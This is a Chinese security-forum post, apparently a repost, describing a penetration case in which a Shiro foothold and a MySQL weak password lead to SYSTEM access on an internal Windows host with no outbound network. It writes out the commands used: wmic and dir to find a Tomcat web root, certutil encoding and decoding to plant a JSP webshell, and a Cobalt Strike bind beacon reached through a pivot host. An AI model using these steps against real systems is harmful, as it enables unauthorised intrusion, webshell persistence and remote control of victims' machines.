安全矩阵

 找回密码
 立即注册
搜索
查看: 1504|回复: 0

一次不出网上线cs实战案例

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2022-7-30 00:52:16 | 显示全部楼层 |阅读模式
原文链接:一次不出网上线cs实战案例


场景
shiro打点获取10段服务器权限,在10段机器出网且已上线cs;172段不出网且反向不通10段,已通过mysql弱口令获取system权限,存在web服务。
上线过程
思路:写入webshell,通过正向马上线cs。
getshell
通过web服务获取一个web目录下的文件名:stf-login-bg.jpg



获取所有盘符
  1. <code class="hljs">wmic logicaldisk get caption,name</code>
复制代码




通过文件名获取web目录
  1. <code class="hljs">dir /a /s /b d:"stf-login-bg.jpg"</code>
复制代码





根据图片URL确定D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\stf-login-bg.jpg为真实web路径,使用\可dir到此路径。



echo配合certutil写入webshell:

  1. //base64编码shell.jsp
  2. certutil -encode shell.jsp jsp.txt

  3. //echo编码后的内容到web目录
  4. echo xxxx >D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt

  5. //解码还原文件
  6. certutil -decode D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\123.jsp
复制代码





上线cs
新建监听器



生成正向马





通过webshell上传到目标机器并执行,使用跳板机连接,上线cs。

  1. <code class="hljs">connect 172.20.57.122 28888</code>
复制代码






回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-26 09:43 , Processed in 0.014908 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表